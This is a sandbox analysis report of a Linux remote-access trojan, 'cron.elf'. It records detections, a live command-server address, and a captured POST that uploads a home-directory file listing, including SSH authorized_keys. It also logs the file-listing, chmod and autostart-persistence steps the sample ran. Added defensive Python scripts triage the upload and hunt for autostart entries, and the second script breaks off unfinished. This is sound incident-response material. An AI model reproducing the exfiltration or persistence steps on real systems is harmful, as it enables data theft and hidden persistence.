Linux Analysis Report
cron.elf

Overview

General Information

Sample name: cron.elf
Analysis ID: 1522583
MD5: 0ee42b6d702553b4e87376859f4139bc
SHA1: f01b9af23aac2cb9eb4b7c82642d15533ccf6db1
SHA256: c12708e6829d7207b16a4fccf65ed05758c676cd70d3e9746c375f5d27bff501

Detection

Score: 92
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Sample and/or dropped files likely contain functionality related to malicious behavior
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using .desktop files
Uses known network protocols on non-standard ports
Writes ELF files to hidden directories
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
ELF contains segments with high entropy indicating compressed/encrypted content
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "uname" command used to read OS and architecture name
Sample and/or dropped files contains symbols with suspicious names
Sample has stripped symbol table
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

AV Detection

Source: cron.elf Avira: detected
Source: /root/.gnome3/cron.elf Avira: detection malicious, Label: LINUX/AVI.Agent.jbqcs
Source: cron.elf ReversingLabs: Detection: 62%
Source: cron.elf Virustotal: Detection: 57%

Networking

Source: Network traffic Suricata IDS: 2829852 - Severity 1 - ETPRO MALWARE Py/Cannibal RAT Checkin M2 : 192.168.2.23:54596 -> 157.173.198.190:15124
Source: unknown Network traffic detected: HTTP traffic on port 54556 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54558 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54560 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54562 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54564 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54566 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54568 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54570 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54572 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54574 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54576 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54578 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54580 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54582 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54584 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54586 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54588 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54590 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54592 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54594 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54596 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54598 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54600 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54602 -> 15124
Source: global traffic TCP traffic: 192.168.2.23:54556 -> 157.173.198.190:15124
Source: unknown TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown HTTP traffic detected:
POST /api/root_245842932284287/upload HTTP/1.1
Host: 157.173.198.190:15124
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Length: 269
Content-Type: multipart/form-data; boundary=0cab8ce8f52f4905853cf8e5cb943139
Data Ascii:
--0cab8ce8f52f4905853cf8e5cb943139
Content-Disposition: form-data; name="uploaded"; filename="list.txt"

./.bashrc
./.profile
./.ssh/authorized_keys
./.config/mimeapps.list
./.viminfo
./.local/share/applications/mimeapps.list

--0cab8ce8f52f4905853cf8e5cb943139--
Source: libpython2.7.so.1.0.12.dr String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: cacert.pem.12.dr String found in binary or memory: http://www.chambersign.org
Source: libpython2.7.so.1.0.12.dr String found in binary or memory: http://www.unicode.org/reports/tr44/tr44-4.html).
Source: libpython2.7.so.1.0.12.dr String found in binary or memory: http://www.unicode.org/reports/tr44/tr44-4.html).xxsubtype
Source: old_root.pem.12.dr String found in binary or memory: http://www.valicert.com/
Source: PKG-INFO.12.dr String found in binary or memory: https://codecov.io/github/pyca/cryptography/coverage.svg?branch=master
Source: PKG-INFO.12.dr String found in binary or memory: https://codecov.io/github/pyca/cryptography?branch=master
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr String found in binary or memory: https://cryptography.io
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr String found in binary or memory: https://cryptography.io/
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr String found in binary or memory: https://cryptography.io/en/latest/installation/
Source: PKG-INFO.12.dr String found in binary or memory: https://github.com/pyca/cryptography
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr String found in binary or memory: https://github.com/pyca/cryptography/issues
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr String found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr String found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr String found in binary or memory: https://pypi.python.org/pypi/cryptography/
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr String found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
Source: PKG-INFO.12.dr String found in binary or memory: https://travis-ci.org/pyca/cryptography
Source: PKG-INFO.12.dr String found in binary or memory: https://travis-ci.org/pyca/cryptography.svg?branch=master
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
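The POST above is the payload that matters in this report: the sample runs `find . -type f` in the home directory and uploads the resulting list.txt (which names ./.ssh/authorized_keys among other files) as a multipart form to 157.173.198.190:15124 with a python-requests User-Agent. The script below is an added example, not part of the sandbox report or of the sample's code: it reconstructs that request from the decoded body shown above (CRLF endings restored so the byte count equals the sent Content-Length of 269), parses the HTTP headers and the multipart body, and flags listed paths that match a set of sensitive-path markers. That marker list and the `triage` output layout are my choices, not something the report defines.

```python
"""Triage a captured multipart upload for exfiltrated file listings (added example)."""
import re

BOUNDARY = "0cab8ce8f52f4905853cf8e5cb943139"

# Constructed from the decoded request body in this report; CRLF line endings
# restored so the byte count equals the Content-Length the sample sent (269).
CAPTURED_BODY = (
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="uploaded"; filename="list.txt"\r\n'
    "\r\n"
    "./.bashrc\n"
    "./.profile\n"
    "./.ssh/authorized_keys\n"
    "./.config/mimeapps.list\n"
    "./.viminfo\n"
    "./.local/share/applications/mimeapps.list\n"
    "\r\n"
    "--" + BOUNDARY + "--\r\n"
).encode()

CAPTURED_REQUEST = "\r\n".join([
    "POST /api/root_245842932284287/upload HTTP/1.1",
    "Host: 157.173.198.190:15124",
    "Connection: keep-alive",
    "Accept-Encoding: gzip, deflate",
    "Accept: */*",
    "User-Agent: python-requests/2.18.4",
    "Content-Length: " + str(len(CAPTURED_BODY)),
    "Content-Type: multipart/form-data; boundary=" + BOUNDARY,
    "", "",
]).encode() + CAPTURED_BODY

# Assumed markers for home-directory paths whose disclosure matters most (my choice, not the report's).
SENSITIVE_MARKERS = (".ssh/", ".gnupg/", ".aws/", ".kube/", ".netrc", ".bash_history", ".docker/config.json")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body, content_type):
    """Yield {name, filename, data} for each part of a multipart/form-data body."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("multipart body without boundary")
    delimiter = b"--" + m.group(1).encode()
    for chunk in body.split(delimiter)[1:]:      # [0] is the preamble, normally empty
        if chunk.startswith(b"--"):              # "--boundary--" closes the body
            break
        chunk = chunk[2:] if chunk.startswith(b"\r\n") else chunk
        part_head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):               # the CRLF before the next delimiter is not payload
            data = data[:-2]
        disposition = ""
        for line in part_head.decode("latin-1").split("\r\n"):
            if line.lower().startswith("content-disposition:"):
                disposition = line
        params = dict(re.findall(r'(\w+)="([^"]*)"', disposition))
        yield {"name": params.get("name"), "filename": params.get("filename"), "data": data}


def triage(raw):
    """Summarise where the upload went and which listed paths are sensitive."""
    method, path, headers, body = parse_request(raw)
    declared = int(headers.get("content-length", "0"))
    result = {
        "method": method, "path": path, "host": headers.get("host"),
        "user_agent": headers.get("user-agent"),
        "length_matches": declared == len(body),
        "uploads": [],
    }
    if "multipart/form-data" not in headers.get("content-type", ""):
        return result
    for part in parse_multipart(body, headers["content-type"]):
        if part["filename"] is None:
            continue                                   # plain form field, not a file
        entries = [l for l in part["data"].decode("utf-8", "replace").splitlines() if l]
        result["uploads"].append({
            "field": part["name"], "filename": part["filename"], "entries": entries,
            "sensitive": [e for e in entries if any(mk in e for mk in SENSITIVE_MARKERS)],
        })
    return result


if __name__ == "__main__":
    import json
    print(json.dumps(triage(CAPTURED_REQUEST), indent=2))
```

Run against the reconstructed request, `triage` reports the destination host and path, confirms the declared Content-Length matches the body, and returns the six listed paths with `./.ssh/authorized_keys` singled out; pointing the same function at a PCAP-extracted request body is the only change needed for a live case.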

System Summary

Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_CTX_get_keylog_callback
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_CTX_set_keylog_callback
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_SESSION_print_keylog
Source: _ssl.so.12.dr ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb
Source: _ssl.so.12.dr ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb_userdata
Source: _ssl.so.12.dr ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: _ssl.so.12.dr ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: cryptography.hazmat.bindings._openssl.so.12.dr ELF static info symbol of dropped file: Cryptography_pem_password_cb
Source: cryptography.hazmat.bindings._openssl.so.12.dr ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: cryptography.hazmat.bindings._openssl.so.12.dr ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: libcrypto.so.1.1.12.dr ELF static info symbol of dropped file: CMS_RecipientInfo_set0_password
Source: libcrypto.so.1.1.12.dr ELF static info symbol of dropped file: CMS_add0_recipient_password
Source: libcrypto.so.1.1.12.dr ELF static info symbol of dropped file: CMS_decrypt_set1_password
Source: libpython2.7.so.1.0.12.dr ELF static info symbol of dropped file: PyOS_InputHook
Source: libpython2.7.so.1.0.12.dr ELF static info symbol of dropped file: _PyImportHooks_Init
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: _rl_match_hidden_files
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: rl_completion_display_matches_hook
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: rl_completion_word_break_hook
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: rl_directory_completion_hook
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: rl_directory_rewrite_hook
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: rl_event_hook
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: rl_execute_next
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: rl_filename_rewrite_hook
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: rl_filename_stat_hook
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: rl_input_available_hook
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: rl_pre_input_hook
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: rl_signal_event_hook
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: rl_startup_hook
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: rl_username_completion_function
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: tilde_expansion_failure_hook
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: tilde_expansion_preexpansion_hook
Source: libreadline.so.7.12.dr ELF static info symbol of dropped file: username_completion_function
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb_userdata
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_CTX_set_srp_password
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_CTX_set_srp_username
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_CTX_set_srp_username_callback
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_get_default_passwd_cb
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_get_default_passwd_cb_userdata
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_get_srp_username
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_set_default_passwd_cb
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_set_default_passwd_cb_userdata
Source: libssl.so.1.1.12.dr ELF static info symbol of dropped file: SSL_srp_server_param_with_username
Source: readline.so.12.dr ELF static info symbol of dropped file: PyOS_InputHook
Source: readline.so.12.dr ELF static info symbol of dropped file: rl_completion_display_matches_hook
Source: readline.so.12.dr ELF static info symbol of dropped file: rl_pre_input_hook
Source: readline.so.12.dr ELF static info symbol of dropped file: rl_startup_hook
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal92.troj.evad.linELF@0/39@0/0

Persistence and Installation Behavior

Source: /tmp/cron.elf (PID: 6242) File: /proc/6242/mounts
Source: /tmp/cron.elf (PID: 6242) File: /root/.config/autostart/gnome3.desktop
Source: /tmp/cron.elf (PID: 6242) File written to hidden directory: /root/.gnome3/cron.elf
Source: /tmp/cron.elf (PID: 6242) Directory: /root/.gnome3
Source: /usr/bin/find (PID: 6370) Directory: /root/.
Source: /usr/bin/find (PID: 6370) Directory: /root/.
Source: /usr/bin/find (PID: 6370) Directory: /root/.cache
Source: /usr/bin/find (PID: 6370) Directory: /root/.ssh
Source: /usr/bin/find (PID: 6370) Directory: /root/.config
Source: /usr/bin/find (PID: 6370) Directory: /root/.local
Source: /tmp/cron.elf (PID: 6245) Shell command executed: sh -c "uname -p 2> /dev/null"
Source: /tmp/cron.elf (PID: 6369) Shell command executed: sh -c "cd; find . -type f > /tmp/list.txt"
Source: /tmp/cron.elf (PID: 6372) Shell command executed: sh -c "chmod +x /root/.gnome3/cron.elf"
Source: /bin/sh (PID: 6373) Chmod executable: /usr/bin/chmod -> chmod +x /root/.gnome3/cron.elf
Source: /usr/bin/dash (PID: 6218) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.daq1fugtlt /tmp/tmp.DKxxUtkXhW /tmp/tmp.wWDD2OqcVY
Source: /usr/bin/dash (PID: 6219) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.daq1fugtlt /tmp/tmp.DKxxUtkXhW /tmp/tmp.wWDD2OqcVY
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/_cffi_backend.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/_codecs_cn.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/_codecs_hk.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/_codecs_iso2022.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/_codecs_jp.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/_codecs_kr.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/_codecs_tw.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/_ctypes.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/_hashlib.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/_json.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/_multibytecodec.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/_ssl.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/bz2.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/cryptography.hazmat.bindings._constant_time.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/cryptography.hazmat.bindings._openssl.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/libbz2.so.1.0 (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/libcrypto.so.1.1 (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/libexpat.so.1 (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/libffi.so.6 (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/libpython2.7.so.1.0 (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/libreadline.so.7 (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/libssl.so.1.1 (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/libtinfo.so.5 (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/libz.so.1 (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/pyexpat.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/readline.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/resource.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/termios.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/certifi/cacert.pem (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/certifi/old_root.pem (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/certifi/weak.pem (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/PKG-INFO (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/dependency_links.txt (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/not-zip-safe (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/requires.txt (bits: - usr: - grp: - all: rwx)
Source: /tmp/cron.elf (PID: 6217) File: /tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/top_level.txt (bits: - usr: - grp: - all: rwx)
Source: /usr/bin/chmod (PID: 6373) File: /root/.gnome3/cron.elf (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/_cffi_backend.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/_codecs_cn.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/_codecs_hk.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/_codecs_iso2022.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/_codecs_jp.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/_codecs_kr.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/_codecs_tw.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/_ctypes.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/_hashlib.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/_json.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/_multibytecodec.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/_ssl.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/bz2.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/cryptography.hazmat.bindings._constant_time.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/cryptography.hazmat.bindings._openssl.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/libbz2.so.1.0
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/libcrypto.so.1.1
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/libexpat.so.1
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/libffi.so.6
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/libpython2.7.so.1.0
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/libreadline.so.7
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/libssl.so.1.1
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/libtinfo.so.5
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/libz.so.1
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/pyexpat.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/readline.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/resource.so
Source: /tmp/cron.elf (PID: 6217) File written: /tmp/_MEIcXSYvg/termios.so
Source: /tmp/cron.elf (PID: 6242) File written: /root/.gnome3/cron.elf
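The persistence chain recorded above is the XDG autostart mechanism: a gnome3.desktop file in /root/.config/autostart whose program is the copy of the sample dropped into the hidden directory /root/.gnome3 and marked executable via chmod. A host-side hunt can key on exactly that shape. The script below is an added example, not part of this report or of the sample: it parses every .desktop file in an autostart directory and flags entries whose Exec program lives in a hidden directory or a world-writable temp path, or that set NoDisplay=true. The gnome3.desktop content it writes to a temporary directory is constructed for the demo (the report records the file's path and the dropped binary's path, not the file's contents), and the benign nm-applet entry is likewise made up.

```python
"""Hunt for suspicious XDG autostart entries (added example, not sandbox-report code)."""
import os
import shlex
import tempfile

# Paths any local user can write to; an autostart Exec pointing here is a strong signal.
WORLD_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")


def autostart_dirs(home):
    """Per-user and system autostart directories an XDG-compliant session reads."""
    cfg = os.environ.get("XDG_CONFIG_HOME") or os.path.join(home, ".config")
    return [os.path.join(cfg, "autostart"), "/etc/xdg/autostart"]


def parse_desktop(text):
    """Return the key/value pairs of the [Desktop Entry] group only."""
    entry, group = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            group = line[1:-1]
            continue
        if group == "Desktop Entry":
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def exec_program(exec_value):
    """First token of Exec=, i.e. the program the session launches (args and %f/%u codes dropped)."""
    try:
        argv = shlex.split(exec_value)
    except ValueError:               # unbalanced quotes: fall back to whitespace split
        argv = exec_value.split()
    return argv[0] if argv else ""


def in_hidden_dir(path):
    """True if any directory component (not the basename) is dot-prefixed."""
    parts = path.split("/")[:-1]
    return any(p.startswith(".") and p not in (".", "..") for p in parts)


def assess(entry):
    """Reasons this entry looks like malware persistence; empty list if none."""
    reasons = []
    if entry.get("Type", "Application") != "Application":
        return reasons               # Link/Directory entries are never executed
    prog = exec_program(entry.get("Exec", ""))
    if not prog:
        return reasons
    if in_hidden_dir(prog):
        reasons.append("Exec lives in a hidden directory: " + prog)
    if prog.startswith(WORLD_WRITABLE_PREFIXES):
        reasons.append("Exec lives in a world-writable temp path: " + prog)
    if entry.get("NoDisplay", "false").lower() == "true":
        reasons.append("NoDisplay=true hides the entry from session settings UIs")
    return reasons


def scan_autostart(dirpath):
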